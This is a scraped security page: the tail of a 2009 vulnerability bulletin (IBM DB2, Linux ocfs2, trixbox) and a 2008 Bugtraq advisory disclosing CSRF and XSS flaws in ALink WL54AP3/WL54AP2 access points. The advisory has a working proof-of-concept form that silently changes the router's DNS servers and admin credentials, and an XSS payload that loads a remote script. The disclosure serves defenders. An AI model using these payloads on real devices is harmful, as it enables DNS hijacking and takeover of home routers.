The Common Code Infrastructure component in IBM DBbefore FP17, 9.1 before FP7, and 9.5 before FP4, when LDAP security (aka IBMLDAPauthserver) and anonymous bind are 2009-06-03 enabled, allows remote attackers to bypass password authentication and establish a database connection via unspecified vectors. The inode double locking code in fs/ocfs2/file.c in the Linux kernel 2.6.30 before 2.6.30-rc3, 2.6.27 before 2.6.27.24, 2.6.29 before 2.6.29.4, and possibly other versions down to 2.6.19 allows local users to cause a denial of service 2009-06-07 (prevention of file creation and removal) via a series of splice system calls that trigger a deadlock between the generic_file_splice_write, splice_from_pipe, and ocfs2_file_splice_write functions. Directory traversal vulnerability in user/index.php in Fonality trixbox CE 2.6.1 and earlier allows remote attackers 2009-06-05 to include and execute arbitrary files via a. (dot dot) in the langChoice parameter.

trixbox -- trixbox

Back to top
Last updated June 09, 2009

Page 12 of 12

ALink WL54AP3 and WL54AP2 CSRF+XSS vulnerability
Source: http://www.derkeiler.com/MailingLists/securityfocus/bugtraq/200811/msg00010.html
From: Henri Lindberg Smilehouse Oy <henri.lindberg@xxxxxxxxxxxxxx> Date: Fri, 31 Oct 2008 15:54:07 +0200 BEGIN PGP SIGNED MESSAGE Hash: SHA256 Louhi Networks Information Security Research Security Advisory
Advisory: ALink WL54AP3 and WL54AP2 CSRF+XSS vulnerability Release Date: 2008/10/31 Last Modified: 2008/10/28 Authors: Jussi Vuokko, CISSP [jussi.vuokko@xxxxxxxx] Henri Lindberg [henri.lindberg@xxxxxxxx] Device: ALink WL54AP3 and WL54AP2 (any firmware) Severity: CSRF and XSS in management interface Risk: Moderate Vendor Status: Vendor has released an updated version References: http://www.louhinetworks.fi/advisory/alink_081028.txt
Overview: Quote from http://www.alink.com/ "WLAN Access point 54MB, 4port Wlan Access point, wireless 54Mbps, DSSS, 802.11gstandard based and it's compatible also with other manufacturers cards." During an audit of ALink WLAN54AP3 it was discovered that a cross site request forgery vulnerability exists in the management interface. It is possible for an attacker to perform any administrative actions in the management interface, if victim can be lured or forced to view malicious content. These administrative actions include e.g. changing admin user's username and password, DNS settings etc. In addition, it was discovered that no input validation or output encoding is performed in management interface, thus making it vulnerable to crosssite scripting. ALink WL54AP3 and WL54AP2 CSRF+XSS vulnerability 1
ALink WL54AP3 and WL54AP2 CSRF+XSS vulnerability By default admin password is blank and no authentication is performed for requests to administrative interface. As ordinary consumers usually use outofthebox settings, this vulnerability offers same kind of phishing possibilities as used in Banamex attacks[1]. ALink WLAN54AP2 (EOL) is vulnerable to this threat as well. [1] http://www.google.fi/search?q=banamex+phishing+dns+poison
Details: ALink WLAN54AP3 does not validate the origin of an HTTP request. If attacker is able to make user view malicious content, the WLAN54AP3 device can be controlled by submitting suitable forms. Attacker is effectively acting as an administrator. Successful attack requires that the attacker knows the management interface address for the target device (default IP address is 192.168.1.254). As the management interface does not have logout functionality, user can be vulnerable to this attack even after closing a tab containing the management interface (if user does not close the browser window or clear cookies and depending on browser behaviour) or if default blank password is used.
Proof of Concept: CSRF: Example form (changes DNS servers, enables WAN web server access and changes user's username and password): <html> <body onload="document.wan.submit(); document.password.submit()"> <form action="http://192.168.1.254/goform/formWanTcpipSetup method="post" name="wan"> <input type="hidden" value="dnsManual" name="dnsMode" checked> <input type="hidden" name="dns1" value="216.239.32.10"> <input type="hidden" name="dns2" value="216.239.32.10"> <input type="hidden" name="dns3" value="216.239.32.10"> <input type="hidden" name="webWanAccess" value="ON" checked="checked"> </form> <form action="http://192.168.1.254/goform/formPasswordSetup method="post" name="password"> <input type="hidden" name="username" value="mallory"> <input type="hidden" name="newpass" value="gotroot"> <input type="hidden" name="confpass" value="gotroot"> </form> ALink WL54AP3 and WL54AP2 CSRF+XSS vulnerability 2
ALink WL54AP3 and WL54AP2 CSRF+XSS vulnerability </body> </html> XSS: Add following content to management interface's Management DDNS Domain Name: ""><script src="http://l7.fi></script><p

Workaround:

Solution: Include a random userspecific token in forms. More information: http://en.wikipedia.org/wiki/Crosssite_request_forgery Perform an input validation and/or an output encoding. More information: http://en.wikipedia.org/wiki/Cross_site_scripting Use secure outofthebox configuration (for example generate default passwords based on device serial or MAC address using a secure cryptographic algorithm).
Disclosure Timeline: 13. September 2008 Contacted ALink by email 28. October 2008 Vendor released an updated version 31. October 2008 Advisory was released
Copyright 2008 Louhi Networks Oy. All rights reserved. BEGIN PGP SIGNATURE iEYEAREIAAYFAkkLDf0ACgkQ3TZNEGeZkm677QCdGIBR9jySnDlKCmtN7eDMUEGM y6sAn26m+4S2I50fuDFxBlaQTO6kqSTK =XEbb END PGP SIGNATURE